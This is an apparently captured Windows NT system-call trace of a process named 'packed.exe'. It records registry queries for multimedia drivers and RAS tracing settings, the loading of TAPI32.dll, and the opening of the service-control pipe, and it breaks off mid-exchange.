 03922   712   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\DRIVERS32"}, ... 544, ) }, ... 544, ) == 0x0
 03923   712   NtQueryValueKey  (544,  (544, "wave", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03924   712   NtQueryValueKey  (544,  (544, "wave1", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03925   712   NtQueryValueKey  (544,  (544, "wave2", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03926   712   NtQueryValueKey  (544,  (544, "wave3", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03927   712   NtQueryValueKey  (544,  (544, "wave4", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03928   712   NtQueryValueKey  (544,  (544, "wave5", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03929   712   NtQueryValueKey  (544,  (544, "wave6", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03930   712   NtQueryValueKey  (544,  (544, "wave7", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03931   712   NtQueryValueKey  (544,  (544, "wave8", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03932   712   NtQueryValueKey  (544,  (544, "wave9", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03933   712   NtQueryValueKey  (544,  (544, "midi", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03934   712   NtQueryValueKey  (544,  (544, "midi1", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03935   712   NtQueryValueKey  (544,  (544, "midi2", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03936   712   NtQueryValueKey  (544,  (544, "midi3", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03937   712   NtQueryValueKey  (544,  (544, "midi4", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03938   712   NtQueryValueKey  (544,  (544, "midi5", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03939   712   NtQueryValueKey  (544,  (544, "midi6", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03940   712   NtQueryValueKey  (544,  (544, "midi7", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03941   712   NtQueryValueKey  (544,  (544, "midi8", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03942   712   NtQueryValueKey  (544,  (544, "midi9", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03943   712   NtQueryTimerResolution  (... 156250, 10000, 156250, ) == 0x0
 03944   712   NtQueryValueKey  (544,  (544, "aux", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03945   712   NtQueryValueKey  (544,  (544, "aux1", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03946   712   NtQueryValueKey  (544,  (544, "aux2", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03947   712   NtQueryValueKey  (544,  (544, "aux3", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03948   712   NtQueryValueKey  (544,  (544, "aux4", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03949   712   NtQueryValueKey  (544,  (544, "aux5", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03950   712   NtQueryValueKey  (544,  (544, "aux6", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03951   712   NtQueryValueKey  (544,  (544, "aux7", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03952   712   NtQueryValueKey  (544,  (544, "aux8", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03953   712   NtQueryValueKey  (544,  (544, "aux9", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03954   712   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 548, ) == 0x0
 03955   712   NtCallbackReturn  (0, 0, 0, ...
 03956   712   NtUserRegisterWindowMessage  ( ("MSJSTICK_VJOYD_MSGSTR", ... ) , ... ) == 0xc07c
 03957   712   NtOpenKey  (0xf003f, {24, 48, 0x40, 0, 0,  (0xf003f, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm"}, ... 552, ) }, ... 552, ) == 0x0
 03958   712   NtQueryValueKey  (552,  (552, "wheel", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (552, "wheel", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 03959   712   NtClose  (552, ... ) == 0x0
 03960   712   NtCreateEvent  (0x1f0003, {24, 64, 0x80, 0, 0,  (0x1f0003, {24, 64, 0x80, 0, 0, "DINPUTWINMM"}, 0, 0, ... ) }, 0, 0, ... ) == STATUS_ACCESS_DENIED
 03961   712   NtQueryValueKey  (544,  (544, "mixer", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03962   712   NtQueryValueKey  (544,  (544, "mixer1", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03963   712   NtQueryValueKey  (544,  (544, "mixer2", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03964   712   NtQueryValueKey  (544,  (544, "mixer3", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03965   712   NtQueryValueKey  (544,  (544, "mixer4", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03966   712   NtQueryValueKey  (544,  (544, "mixer5", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03967   712   NtQueryValueKey  (544,  (544, "mixer6", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03968   712   NtQueryValueKey  (544,  (544, "mixer7", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03969   712   NtQueryValueKey  (544,  (544, "mixer8", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03970   712   NtQueryValueKey  (544,  (544, "mixer9", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03971   712   NtQueryDefaultUILanguage  (24703012, ...
 03972   712   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 03973   712   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... -2147482020, ) == 0x0
 03974   712   NtQueryInformationToken  (-2147482020, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 03975   712   NtClose  (-2147482020, ... ) == 0x0
 03976   712   NtOpenKey  (0x2000000, {24, 0, 0x640, 0, 0,  (0x2000000, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003"}, ... -2147482020, ) }, ... -2147482020, ) == 0x0
 03977   712   NtOpenKey  (0x80000000, {24, 0, 0x240, 0, 0,  (0x80000000, {24, 0, 0x240, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\Nls\MUILanguages"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03978   712   NtOpenKey  (0x80000000, {24, -2147482020, 0x640, 0, 0,  (0x80000000, {24, -2147482020, 0x640, 0, 0, "Control Panel\Desktop"}, ... -2147482016, ) }, ... -2147482016, ) == 0x0
 03979   712   NtQueryValueKey  (-2147482016,  (-2147482016, "MultiUILanguageId", Partial, 256, ... ) , Partial, 256, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03980   712   NtClose  (-2147482016, ... ) == 0x0
 03981   712   NtClose  (-2147482020, ... ) == 0x0
 03971   712   NtQueryDefaultUILanguage  ... ) == 0x0
 03982   712   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\Nls\MUILanguages"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03983   712   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\TAPI32.dll"}, 1, 96, ... 552, {status=0x0, info=1}, ) }, 1, 96, ... 552, {status=0x0, info=1}, ) == 0x0
 03984   712   NtCreateSection  (0x4, 0x0, 0x0, 2, 134217728, 552, ... 556, ) == 0x0
 03985   712   NtMapViewOfSection  (556, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 2, ... (0x1790000), 0x0, 163840, ) == 0x0
 03986   712   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\TAPI32.dll.124.Manifest"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03987   712   NtAllocateVirtualMemory  (-1, 24690688, 0, 4096, 4096, 260, ... 24690688, 4096, ) == 0x0
 03988   712   NtQueryDefaultLocale  (1, 24701048, ... ) == 0x0
 03989   712   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\TAPI32.dll.124.Config"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03990   712   NtRequestWaitReplyPort  (24, {128, 156, new_msg, 0, 24701904, 1, 96, 0}  (24, {128, 156, new_msg, 0, 24701904, 1, 96, 0} "\210\6\31\1\33\0\1\0\0\0\0\0\1\357x\1\1\0\0\0\0\0\11\4\1\1\1\0<\0@\0\250\6\31\1(\2\0\0\377\377\377\377\0\0\0\0\360Z{\1\0\0\0\0\251\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6\31\1\0\0\0\0\0\0\0\0\320\362x\1\0\0\0\0" ... {128, 156, reply, 0, 452, 712, 1575, 0} " S\26\0\33\0\1\0\0\0\0\0\1\357x\1\1\0\0\0\0\0\11\4\1\1\1\0<\0@\0\250\6\31\1(\2\0\0\377\377\377\377\0\0\0\0\360Z{\1\0\0\0\0\251\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6\31\1\0\0\0\0\0\0\0\0\320\362x\1\0\0\0\0" )  ... {128, 156, reply, 0, 452, 712, 1575, 0}  (24, {128, 156, new_msg, 0, 24701904, 1, 96, 0} "\210\6\31\1\33\0\1\0\0\0\0\0\1\357x\1\1\0\0\0\0\0\11\4\1\1\1\0<\0@\0\250\6\31\1(\2\0\0\377\377\377\377\0\0\0\0\360Z{\1\0\0\0\0\251\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6\31\1\0\0\0\0\0\0\0\0\320\362x\1\0\0\0\0" ... {128, 156, reply, 0, 452, 712, 1575, 0} " S\26\0\33\0\1\0\0\0\0\0\1\357x\1\1\0\0\0\0\0\11\4\1\1\1\0<\0@\0\250\6\31\1(\2\0\0\377\377\377\377\0\0\0\0\360Z{\1\0\0\0\0\251\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6\31\1\0\0\0\0\0\0\0\0\320\362x\1\0\0\0\0" )  ) == 0x0
 03991   712   NtClose  (552, ... ) == 0x0
 03992   712   NtClose  (556, ... ) == 0x0
 03993   712   NtUnmapViewOfSection  (-1, 0x1790000, ... ) == 0x0
 03994   712   NtUnmapViewOfSection  (-1, 0x178f2d0, ... ) == STATUS_NOT_MAPPED_VIEW
 03995   712   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 03996   712   NtOpenKey  (0x8, {24, 0, 0x40, 0, 0,  (0x8, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 03997   712   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 03998   712   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 03999   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\packed.exe.Local\"}, 24700132, ... ) }, 24700132, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04000   712   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 04001   712   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 04002   712   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 04003   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a"}, 24700724, ... ) }, 24700724, ... ) == 0x0
 04004   712   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a"}, 3, 33, ... 556, {status=0x0, info=1}, ) }, 3, 33, ... 556, {status=0x0, info=1}, ) == 0x0
 04005   712   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 04006   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Telephony"}, ... 552, ) }, ... 552, ) == 0x0
 04007   712   NtQueryValueKey  (552,  (552, "Tapi32MaxNumRequestRetries", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04008   712   NtQueryValueKey  (552,  (552, "Tapi32RequestRetryTimeout", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04009   712   NtClose  (552, ... ) == 0x0
 04010   712   NtCreateMutant  (0x1f0001, 0x0, 0, ... 552, ) == 0x0
 04011   712   NtCreateMutant  (0x1f0001, {24, 64, 0x80, 1525328, 0,  (0x1f0001, {24, 64, 0x80, 1525328, 0, "RasPbFile"}, 0, ... ) }, 0, ... ) == STATUS_ACCESS_DENIED
 04012   712   NtOpenMutant  (0x100000, {24, 64, 0x0, 0, 0,  (0x100000, {24, 64, 0x0, 0, 0, "RasPbFile"}, ... 560, ) }, ... 560, ) == 0x0
 04013   712   NtCreateEvent  (0x1f0003, 0x0, 0, 1, ... 564, ) == 0x0
 04014   712   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 568, ) == 0x0
 04015   712   NtCreateEvent  (0x1f0003, 0x0, 0, 1, ... 572, ) == 0x0
 04016   712   NtCreateSemaphore  (0x100003, 0x0, 0, 2147483647, ... 576, ) == 0x0
 04017   712   NtCreateSemaphore  (0x100003, 0x0, 0, 2147483647, ... 580, ) == 0x0
 04018   712   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 584, ) == 0x0
 04019   712   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 588, ) == 0x0
 04020   712   NtCreateKey  (0xf003f, {24, 48, 0x40, 0, 0,  (0xf003f, {24, 48, 0x40, 0, 0, "Software\Microsoft\Tracing"}, 0, 0x0, 0, ... 592, 2, ) }, 0, 0x0, 0, ... 592, 2, ) == 0x0
 04021   712   NtQueryValueKey  (592,  (592, "EnableConsoleTracing", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (592, "EnableConsoleTracing", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 04022   712   NtClose  (592, ... ) == 0x0
 04023   712   NtCreateSemaphore  (0x100003, 0x0, 0, 2147483647, ... 592, ) == 0x0
 04024   712   NtCreateSemaphore  (0x100003, 0x0, 0, 2147483647, ... 596, ) == 0x0
 04025   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\Tracing\RASAPI32"}, ... 600, ) }, ... 600, ) == 0x0
 04026   712   NtQueryValueKey  (600,  (600, "EnableFileTracing", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (600, "EnableFileTracing", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 04027   712   NtQueryValueKey  (600,  (600, "FileTracingMask", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\377\377"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (600, "FileTracingMask", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\377\377"}, 16, ) }, 16, ) == 0x0
 04028   712   NtQueryValueKey  (600,  (600, "EnableConsoleTracing", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (600, "EnableConsoleTracing", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 04029   712   NtQueryValueKey  (600,  (600, "ConsoleTracingMask", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\377\377"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (600, "ConsoleTracingMask", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\377\377"}, 16, ) }, 16, ) == 0x0
 04030   712   NtQueryValueKey  (600,  (600, "MaxFileSize", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\20\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (600, "MaxFileSize", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\20\0"}, 16, ) }, 16, ) == 0x0
 04031   712   NtQueryValueKey  (600,  (600, "FileDirectory", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0w\0i\0n\0d\0i\0r\0%\0\\0t\0r\0a\0c\0i\0n\0g\0\0\0"}, 46, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (600, "FileDirectory", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0w\0i\0n\0d\0i\0r\0%\0\\0t\0r\0a\0c\0i\0n\0g\0\0\0"}, 46, ) }, 46, ) == 0x0
 04032   712   NtQueryValueKey  (600,  (600, "FileDirectory", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0w\0i\0n\0d\0i\0r\0%\0\\0t\0r\0a\0c\0i\0n\0g\0\0\0"}, 46, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (600, "FileDirectory", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0w\0i\0n\0d\0i\0r\0%\0\\0t\0r\0a\0c\0i\0n\0g\0\0\0"}, 46, ) }, 46, ) == 0x0
 04033   712   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 604, ) == 0x0
 04034   712   NtNotifyChangeKey  (600, 604, 0, 0, 2011390432, 14, 0, 0, 0, 1, ... ) == 0x103
 04035   712   NtQueryValueKey  (600,  (600, "EnableFileTracing", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (600, "EnableFileTracing", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 04036   712   NtQueryValueKey  (600,  (600, "FileTracingMask", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\377\377"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (600, "FileTracingMask", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\377\377"}, 16, ) }, 16, ) == 0x0
 04037   712   NtQueryValueKey  (600,  (600, "EnableConsoleTracing", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (600, "EnableConsoleTracing", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 04038   712   NtQueryValueKey  (600,  (600, "ConsoleTracingMask", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\377\377"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (600, "ConsoleTracingMask", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\377\377"}, 16, ) }, 16, ) == 0x0
 04039   712   NtQueryValueKey  (600,  (600, "MaxFileSize", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\20\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (600, "MaxFileSize", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\20\0"}, 16, ) }, 16, ) == 0x0
 04040   712   NtQueryValueKey  (600,  (600, "FileDirectory", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0w\0i\0n\0d\0i\0r\0%\0\\0t\0r\0a\0c\0i\0n\0g\0\0\0"}, 46, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (600, "FileDirectory", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0w\0i\0n\0d\0i\0r\0%\0\\0t\0r\0a\0c\0i\0n\0g\0\0\0"}, 46, ) }, 46, ) == 0x0
 04041   712   NtQueryValueKey  (600,  (600, "FileDirectory", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0w\0i\0n\0d\0i\0r\0%\0\\0t\0r\0a\0c\0i\0n\0g\0\0\0"}, 46, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (600, "FileDirectory", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0w\0i\0n\0d\0i\0r\0%\0\\0t\0r\0a\0c\0i\0n\0g\0\0\0"}, 46, ) }, 46, ) == 0x0
 04042   712   NtNotifyChangeKey  (600, 604, 0, 0, 2011390432, 14, 0, 0, 0, 1, ... ) == 0x103
 04043   712   NtSetEvent  (588, ... 0x0, ) == 0x0
 04044   712   NtOpenEvent  (0x100000, {24, 64, 0x0, 0, 0,  (0x100000, {24, 64, 0x0, 0, 0, "Global\SvcctrlStartEvent_A3752DX"}, ... 608, ) }, ... 608, ) == 0x0
 04045   712   NtWaitForSingleObject  (608, 0, {-1800000000, -1}, ... ) == 0x0
 04046   712   NtClose  (608, ... ) == 0x0
 04047   712   NtAllocateVirtualMemory  (-1, 1527808, 0, 4096, 4096, 4, ... 1527808, 4096, ) == 0x0
 04048   712   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 608, ) == 0x0
 04049   712   NtDuplicateObject  (-1, -2, -1, 0x0, 0, 2, ... 612, ) == 0x0
 04050   712   NtOpenThreadToken  (-2, 0xc, 1, ... ) == STATUS_NO_TOKEN
 04051   712   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 616, ) == 0x0
 04052   712   NtOpenThreadToken  (-2, 0xc, 1, ... ) == STATUS_NO_TOKEN
 04053   712   NtSetInformationThread  (-2, ImpersonationToken, {ImpToken=0,}, 4, ... ) == 0x0
 04054   712   NtCreateFile  (0xc0100080, {24, 0, 0x40, 0, 24704780,  (0xc0100080, {24, 0, 0x40, 0, 24704780, "\??\PIPE\svcctl"}, 0x0, 0, 3, 1, 4194368, 0, 0, ... 620, {status=0x0, info=1}, ) }, 0x0, 0, 3, 1, 4194368, 0, 0, ... 620, {status=0x0, info=1}, ) == 0x0
 04055   712   NtSetInformationFile  (620, 24704836, 8, Pipe, ... {status=0x0, info=0}, ) == 0x0
 04056   712   NtSetInformationFile  (620, 24704828, 8, Completion, ... {status=0x0, info=0}, ) == 0x0
 04057   712   NtSetInformationThread  (-2, ImpersonationToken, {ImpToken=0,}, 4, ... ) == 0x0
 04058   712   NtWriteFile  (620, 609, 0, 0,  (620, 609, 0, 0, "\5\0\13\3\20\0\0\0H\0\0\0\1\0\0\0\270\20\270\20\0\0\0\0\1\0\0\0\0\0\1\0\201\273z6D\230\3615\2552\230\3608\0\20\3\2\0\0\0\4]\210\212\353\34\311\21\237\350\10\0+\20H`\2\0\0\0", 72, {0, 0}, 0, ... {status=0x0, info=72}, ) , 72, {0, 0}, 0, ... {status=0x0, info=72}, ) == 0x0
 04059   712   NtReadFile  (620, 609, 0, 0, 1024, {0, 0}, 0, ... {status=0x0, info=68},  (620, 609, 0, 0, 1024, {0, 0}, 0, ... {status=0x0, info=68}, "\5\0\14\3\20\0\0\0D\0\0\0\1\0\0\0\270\20\270\20\323\34\0\0\15\0\PIPE\ntsvcs\0\21\1\0\0\0\0\0\0\0\4]\210\212\353\34\311\21\237\350\10\0+\20H`\2\0\0\0", ) , ) == 0x0
 04060   712   NtFsControlFile  (620, 609, 0x0, 0x0, 0x11c017,  (620, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0$\0\0\0\1\0\0\0\14\0\0\0\0\0\17\0\0\0\0\0\0\0\0\0\0\0\0\200", 36, 1024, ... {status=0x103, info=68}, "\5\0\14\3\20\0\0\0D\0\0\0\1\0\0\0\270\20\270\20\323\34\0\0\15\0\PIPE\ntsvcs\0\21\1\0\0\0\0\0\0\0\4]\210\212\353\34\311\21\237\350\10\0+\20H`\2\0\0\0", ) , 36, 1024, ... {status=0x103, info=68},  (620, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0$\0\0\0\1\0\0\0\14\0\0\0\0\0\17\0\0\0\0\0\0\0\0\0\0\0\0\200", 36, 1024, ... {status=0x103, info=68}, "\5\0\14\3\20\0\0\0D\0\0\0\1\0\0\0\270\20\270\20\323\34\0\0\15\0\PIPE\ntsvcs\0\21\1\0\0\0\0\0\0\0\4]\210\212\353\34\311\21\237\350\10\0+\20H`\2\0\0\0", ) , ) == 0x103
 04061   712   NtFsControlFile  (620, 609, 0x0, 0x0, 0x11c017,  (620, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0L\0\0\0\2\0\0\04\0\0\0\0\0\20\0\0\0\0\0\371a-K\351?\334\21\261\310\0\14)\371\246\305\7\0\0\0\0\0\0\0\7\0\0\0R\0A\0S\0M\0A\0N\0\0\0\0\0\4\0\0\0", 76, 1024, ... {status=0x103, info=48}, "\5\0\2\3\20\0\0\00\0\0\0\1\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0\371a-K\351?\334\21\261\310\0\14)\371\246\305\0\0\0\0", ) , 76, 1024, ... {status=0x103, info=48},  (620, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0L\0\0\0\2\0\0\04\0\0\0\0\0\20\0\0\0\0\0\371a-K\351?\334\21\261\310\0\14)\371\246\305\7\0\0\0\0\0\0\0\7\0\0\0R\0A\0S\0M\0A\0N\0\0\0\0\0\4\0\0\0", 76, 1024, ... {status=0x103, info=48}, "\5\0\2\3\20\0\0\00\0\0\0\1\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0\371a-K\351?\334\21\261\310\0\14)\371\246\305\0\0\0\0", ) , ) == 0x103
 04062   712   NtFsControlFile  (620, 609, 0x0, 0x0, 0x11c017,  (620, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0,\0\0\0\3\0\0\0\24\0\0\0\0\0\6\0\0\0\0\0\372a-K\351?\334\21\261\310\0\14)\371\246\305", 44, 1024, ... {status=0x103, info=48}, "\5\0\2\3\20\0\0\00\0\0\0\2\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0\372a-K\351?\334\21\261\310\0\14)\371\246\305\0\0\0\0", ) , 44, 1024, ... {status=0x103, info=48},  (620, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0,\0\0\0\3\0\0\0\24\0\0\0\0\0\6\0\0\0\0\0\372a-K\351?\334\21\261\310\0\14)\371\246\305", 44, 1024, ... {status=0x103, info=48}, "\5\0\2\3\20\0\0\00\0\0\0\2\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0\372a-K\351?\334\21\261\310\0\14)\371\246\305\0\0\0\0", ) , ) == 0x103
